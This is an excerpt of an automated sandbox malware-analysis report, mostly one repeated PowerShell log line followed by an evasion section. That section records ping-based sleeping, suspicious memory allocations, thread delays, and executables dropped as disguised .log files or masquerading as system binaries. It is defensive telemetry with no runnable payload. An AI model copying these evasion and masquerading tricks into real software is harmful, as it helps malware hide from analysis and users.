                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: 1A8A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\upfc.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\upfc.exeMemory allocated: 1B150000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\upfc.exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\upfc.exeMemory allocated: 1B1A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeMemory allocated: 2C00000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeMemory allocated: 1ADB0000 memory reserve | memory write watch
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeMemory allocated: 15B0000 memory reserve | memory write watch
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeMemory allocated: 1B150000 memory reserve | memory write watch
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeMemory allocated: AC0000 memory reserve | memory write watch
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeMemory allocated: 1A630000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeMemory allocated: D60000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeMemory allocated: 1AB30000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeMemory allocated: 11A0000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeMemory allocated: 1AD80000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeMemory allocated: F30000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeMemory allocated: 1ABE0000 memory reserve | memory write watch
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: C80000 memory reserve | memory write watch
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: 1A900000 memory reserve | memory write watch
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: EC0000 memory reserve | memory write watch
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
                                    Source: C:\Browserhost\intoHostperf.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\intoHostperf.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\intoHostperf.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2260
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2077
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1944
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2053
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2883
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1695
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\HhGhtKRk.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\jcBCwIrh.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\QuHEOinP.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\GTYGJoJn.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\TkyvVenI.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\WuUwVxTJ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\zmrZuvIB.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\pEXJLSDT.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\bnxVycYy.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\NzFoXiJZ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\urpInPSH.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\wtcqJyWC.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\kIWsDnNZ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\DaJYXsXp.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\xpPRZvtG.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\QQZxdmXS.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\AkShQvXv.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\CdhQCsIu.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\nBlbpjyY.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZuimMgmz.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\TBFNkAhL.logJump to dropped file
